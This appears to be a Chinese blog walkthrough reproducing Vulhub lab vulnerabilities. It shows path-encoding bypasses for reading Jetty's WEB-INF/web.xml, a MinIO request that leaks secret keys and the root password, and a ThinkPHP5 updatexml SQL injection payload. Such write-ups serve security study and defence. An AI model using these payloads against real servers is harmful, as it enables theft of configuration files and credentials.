Vulhub-信息泄露

1.Jetty WEB-INF 敏感信息泄露漏洞(CVE-2021-28164)

docker-compose up -d 启动环境,显示8080端口被占用

修改 docker-compose.yml 中的映射端口

curl 访问 http://192.168.48.129:8090/WEB-INF/web.xml

显示404:

通过 %2e 绕过

curl -v 'http://192.168.48.129:8090/%2e/WEB-INF/web.xml'

2. Jetty 通用 Servlets 组件 ConcatServlet 信息泄露漏洞(CVE-2021-28169)

环境启动后,访问http://your-ip:8080即可查看到一个example页面。该页面使用到了ConcatServlet来优化静态文件的加载:

<link rel="stylesheet" href="/static?/css/base.css&/css/app.css">

 漏洞利用

正常通过/static?/WEB-INF/web.xml无法访问到敏感文件web.xml:

对字母W进行双URL编码(%2557),即可绕过限制访问web.xml:


3.Jetty WEB-INF 敏感信息泄露漏洞(CVE-2021-34429)

Eclipse Jetty是一个开源的servlet容器,它为基于Java的Web容器提供运行环境。

Jetty在9.4.40后修复了因为%2e导致的敏感信息泄露漏洞CVE-2021-28164,但这个修复是不完全的,通过下面三种方式可以进行绕过:

  • unicode形式URL编码:/%u002e/WEB-INF/web.xml
  • \0组合.导致的绕过:/.%00/WEB-INF/web.xml
  • \0组合..导致的绕过:/a/b/..%00/WEB-INF/web.xml

影响版本:9.4.37-9.4.42, 10.0.1-10.0.5, 11.0.1-11.0.5

漏洞复现:

直接访问/WEB-INF/web.xml将会返回404页面:

使用/%u002e/WEB-INF/web.xml来绕过限制下载web.xml:


 

4.MinIO集群模式信息泄露漏洞 (CVE-2023-28432)

执行如下命令启动一个MinIO集群,其中包含3个以集群模式运行的服务:

docker compose up -d

集群启动后,访问http://your-ip:9001可以查看Web管理页面,访问http://your-ip:9000是API服务。

漏洞复现

这个漏洞存在于API节点http://your-ip:9000/minio/bootstrap/v1/verify上,发送如下数据包即可查看泄露的环境变量:

(抓包 http://your-ip:9000/minio/bootstrap/v1/verify)修改 请求头GET 为 POST

可见,其中包含MINIO_SECRET_KEYMINIO_ROOT_PASSWORD。使用这个账号密码,即可成功登录管理后台:

5.ThinkPHP5 SQL注入漏洞/信息泄露

启动后,访问http://your-ip/index.php?ids[]=1&ids[]=2,即可看到用户名被显示了出来,说明环境运行成功。

访问http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1,信息成功被爆出:

通过DEBUG页面,我们找到了数据库的账号、密码 

这又属于一个敏感信息泄露漏洞。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

斜躺青年

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值